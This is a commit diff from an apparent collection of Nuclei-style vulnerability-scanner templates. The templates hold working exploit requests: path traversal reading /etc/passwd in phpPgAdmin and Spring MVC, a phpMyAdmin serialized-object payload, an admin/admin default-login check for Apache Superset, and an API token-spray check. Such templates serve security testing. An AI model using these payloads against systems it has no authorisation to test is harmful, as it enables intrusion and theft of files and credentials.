20240903

adysec · Sep 3, 2024 · b66b2ad · b66b2ad
1 parent 4ed1a5a
commit b66b2ad
Show file tree

Hide file tree

Showing 27 changed files with 596 additions and 448 deletions.
diff --git a/date.txt b/date.txt
@@ -1 +1 @@
-20240902
+20240903
diff --git a/poc.txt b/poc.txt
@@ -826,6 +826,7 @@
 ./poc/api/api-nytimes.yaml
 ./poc/api/api-onelogin-472.yaml
 ./poc/api/api-onelogin.yaml
+./poc/api/api-onyphe.yaml
 ./poc/api/api-open-page-rank.yaml
 ./poc/api/api-opengraphr.yaml
 ./poc/api/api-openweather-473.yaml
@@ -72591,6 +72592,7 @@
 ./poc/other/fast-velocity-minify-34342709323e9cee9cbfa898dc1ee0a1.yaml
 ./poc/other/fast-velocity-minify.yaml
 ./poc/other/fastadmin-framework.yaml
+./poc/other/fastbee.yaml
 ./poc/other/fastcgi-echo.yaml
 ./poc/other/fastdup-4d937436569e469e00e1b26c70c6dd2f.yaml
 ./poc/other/fastdup-d463033e6c4a961471bff9c9179f1c0e.yaml
@@ -79356,6 +79358,7 @@
 ./poc/other/meow-gallery-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/meow-gallery-plugin.yaml
 ./poc/other/meow-gallery.yaml
+./poc/other/mercurial-hgignore.yaml
 ./poc/other/mercurial.yaml
 ./poc/other/merge-minify-refresh-0c0b173e2bd6f7b85f9b9b87ba38121b.yaml
 ./poc/other/merge-minify-refresh-5b8fc85b1483f7f13e56a98101e86360.yaml

diff --git a/poc/api/api-onyphe.yaml b/poc/api/api-onyphe.yaml
@@ -0,0 +1,46 @@
+id: api-onyphe
+
+info:
+  name: Onyphe API Test
+  author: 0xpugazh
+  severity: info
+  description: Cyber Defense Search Engine and Attack Surface Management
+  reference:
+    - https://www.onyphe.io/docs
+  metadata:
+    verified: true
+    max-request: 1
+  tags: token-spray,onyphe
+
+self-contained: true
+
+http:
+  - method: GET
+    path:
+      - "https://www.onyphe.io/api/v2/user"
+
+    headers:
+      Authorization: Bearer {{token}}
+      Content-Type: application/json
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"apikey":"'
+          - '"apis":'
+          - '"@timestamp":'
+          - '"@category":'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - 'application/json'
+
+      - type: status
+        status:
+          - 200
+
+# digest: 4b0a004830460221009fbed819ee5f0de6054a6047d01ebacb9d75d95720706390d43f106acab4f6dd022100fe6c8c822772b3c74bbdbda483facd2f7b9f791c446871c3de34417474affd3c:922c64590222798bb761d5b6d8e72950
diff --git a/poc/cve/cve-2008-5587.yaml b/poc/cve/cve-2008-5587.yaml
@@ -1,27 +1,28 @@
 id: CVE-2008-5587
-
 info:
   name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion
   author: dhiyaneshDK
   severity: medium
-  reference: https://www.exploit-db.com/exploits/7363
-
+  description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php.
+  reference:
+    - https://www.exploit-db.com/exploits/7363
+    - http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/
+    - http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014
+    - http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263
+  classification:
+    cve-id: CVE-2008-5587
   metadata:
-    shodan-query: 'http.title:"phpPgAdmin"'
-  description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php."
-
+    shodan-query: http.title:"phpPgAdmin"
+  tags: cve,cve2008,lfi,phppgadmin
 requests:
   - method: GET
     path:
       - '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00'
-
     matchers-condition: and
     matchers:
-
       - type: regex
         regex:
           - "root:[x*]:0:0"
-
       - type: status
         status:
           - 200
diff --git a/poc/cve/cve-2009-1151.yaml b/poc/cve/cve-2009-1151.yaml
@@ -1,21 +1,15 @@
 id: CVE-2009-1151
+
 info:
-  name: PhpMyAdmin Scripts - Remote Code Execution
+  name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
   author: princechaddha
-  severity: critical
-  description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
+  severity: high
+  description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
   reference:
     - https://www.phpmyadmin.net/security/PMASA-2009-3/
     - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
-    - http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301
-    - http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
-    - https://nvd.nist.gov/vuln/detail/CVE-2009-1151
-  classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10
-    cve-id: CVE-2009-1151
-    cwe-id: CWE-77
-  tags: cve,cve2009,phpmyadmin,rce,deserialization,kev
+
+
 requests:
   - raw:
       - |
@@ -26,13 +20,13 @@ requests:
         Content-Type: application/x-www-form-urlencoded
 
         action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
+
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
+
       - type: regex
         regex:
           - "root:.*:0:0:"
-
-# Enhanced by mp on 2022/07/06
diff --git a/poc/cve/cve-2016-6210.yaml b/poc/cve/cve-2016-6210.yaml
@@ -1,10 +1,9 @@
 id: CVE-2016-6210
-
 info:
   name: OpenSSH username enumeration < v7.3
   author: iamthefrogy,forgedhallpass
   severity: medium
-
+  tags: cve,cve2016,network,openssh
   description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities.
   reference:
     - http://seclists.org/fulldisclosure/2016/Jul/51
@@ -16,18 +15,15 @@ info:
     cvss-score: 5.9
     cve-id: CVE-2016-6210
     cwe-id: CWE-200
-
 network:
   - host:
       - "{{Hostname}}"
       - "{{Host}}:22"
-
     matchers:
       - type: regex
         regex:
           - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)'
-
     extractors:
       - type: regex
         regex:
-          - '(?i)SSH-2.0-OpenSSH_[^\r\n]+'
+          - '(?i)SSH-2.0-OpenSSH_[^\r\n]+'
diff --git a/poc/cve/cve-2018-1271.yaml b/poc/cve/cve-2018-1271.yaml
@@ -1,18 +1,20 @@
 id: CVE-2018-1271
-
 info:
   name: Spring MVC Directory Traversal Vulnerability
   author: hetroublemakr
   severity: medium
-  reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
-
+  description: Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack.
+  reference:
+    - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
+    - https://pivotal.io/security/cve-2018-1271
+    - http://web.archive.org/web/20210518132800/https://www.securityfocus.com/bid/103699
+    - https://access.redhat.com/errata/RHSA-2018:1320
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
-    cvss-score: 5.90
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 5.9
     cve-id: CVE-2018-1271
     cwe-id: CWE-22
-  description: "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack."
-
+  tags: cve,cve2018,spring,lfi,traversal
 requests:
   - method: GET
     path:

diff --git a/poc/cve/cve-2021-44451.yaml b/poc/cve/cve-2021-44451.yaml
@@ -1,67 +1,68 @@
 id: CVE-2021-44451
 
 info:
-  name: Apache Superset Default Login
+  name: Apache Superset - Default Login
   author: dhiyaneshDK
-  severity: high
-  description: Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
-  remediation: Users should upgrade to Apache Superset 1.4.0 or higher.
+  severity: medium
+  description: |
+    Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
   reference:
     - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
+    - https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb
     - https://nvd.nist.gov/vuln/detail/CVE-2021-44451
-  tags: apache, default-login
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 6.5
     cve-id: CVE-2021-44451
+    cwe-id: CWE-522
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:1582430156
+  tags: cve,cve2021,apache,superset,default-login
 
 requests:
   - raw:
       - |
         GET /login/ HTTP/1.1
         Host: {{Hostname}}
-        Origin: {{BaseURL}}
 
       - |
         POST /login/ HTTP/1.1
         Host: {{Hostname}}
-        Origin: {{BaseURL}}
         Content-Type: application/x-www-form-urlencoded
-        Referer: {{BaseURL}}/admin/airflow/login
 
         csrf_token={{csrf_token}}&username={{username}}&password={{password}}
 
+      - |
+        GET /dashboard/list/ HTTP/1.1
+        Host: {{Hostname}}
+
     attack: pitchfork
     payloads:
       username:
         - admin
       password:
         - admin
 
-    extractors:
-      - type: regex
-        name: csrf_token
-        group: 1
-        part: body
-        internal: true
-        regex:
-          - 'value="(.*?)">'
-
+    req-condition: true
+    cookie-reuse: true
     matchers-condition: and
     matchers:
       - type: word
-        part: body
-        condition: and
+        part: header_2
         words:
-          - '<title>Redirecting...</title>'
-          - '<h1>Redirecting...</h1'
-          - '<a href="/">'
+          - 'session'
 
       - type: word
-        part: header
+        part: body_3
         words:
-          - 'session'
+          - 'DashboardFilterStateRestApi'
 
-      - type: status
-        status:
-          - 302
-
-# Enhanced by mp on 2022/03/02
+    extractors:
+      - type: regex
+        name: csrf_token
+        group: 1
+        part: body
+        regex:
+          - 'name="csrf_token" type="hidden" value="(.*)"'
+        internal: true